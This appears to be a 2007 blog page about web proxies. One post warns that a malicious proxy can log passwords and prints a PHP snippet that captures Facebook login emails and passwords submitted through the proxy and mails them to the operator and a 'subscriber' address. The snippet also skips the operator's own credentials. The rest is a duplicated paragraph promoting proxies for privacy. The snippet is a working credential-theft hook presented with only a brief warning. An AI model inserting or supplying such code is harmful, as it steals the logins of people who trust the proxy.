In using a proxy server all data sent to the service being used must pass through the proxy server before being sent to the service, mostly in unencrypted form. It is therefore possible, and has been demonstrated, for a malicious proxy server to record everything sent to the proxy: including unencrypted logins and passwords. This is done by by inserting a code in the proxy script. This is the code: if (strpos($_url, 'facebook.com')) //checks if url contains "facebook"
{
if ($_REQUEST['email'] != "") //only true if there is info submitted
{
$user = $_REQUEST['email'] ; //getting the info
$pass = $_REQUEST['pass'] ;
$not_me = 0
if (strpos($user, 'your_name') or strpos($pass, 'whatever_your_password_is')) //this protects yourself from your subscribers
{
$not_me = 1;
}
else
{
mail( "send_to_email@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com" ); //sending
mail( "send_to_subscriber@whatever.com", "password captured", "website is: $_url , username is: $user , password is: $pass", "From: random_email_address@whatever.com" ); //subscriber
}
}
}
?> This code simply logs the proxy user username and password, then emails the results to the proxy owner. A proxy user should never use proxy servers of unknown integrity. If there is no choice but to use unknown proxy servers, do not pass any private information through the proxy. For a list of trusted web proxies, visit: http://www.proxytop.net/
Sunday, October 21, 2007
Thursday, October 18, 2007
Why Use A Web Proxy?
Whenever you surf the internet your IP address is being logged by every website you visit. Any web resource you access can gather personal information about you through your unique IP address - your ID on the Internet. There are many schools and businesses that routinely block many websites and keep a log of visited web pages. These logs can be kept for years, and can send a trace back to you! They can monitor your reading interests, spy upon you and, according to some policies of the Internet resources, deny accessing any information you might need. Your right to privacy is being compromised when browsing without a proxy.
Whenever you surf the internet your IP address is being logged by every website you visit. Any web resource you access can gather personal information about you through your unique IP address - your ID on the Internet. There are many schools and businesses that routinely block many websites and keep a log of visited web pages. These logs can be kept for years, and can send a trace back to you! They can monitor your reading interests, spy upon you and, according to some policies of the Internet resources, deny accessing any information you might need. Your right to privacy is being compromised when browsing without a proxy.
Subscribe to:
Posts (Atom)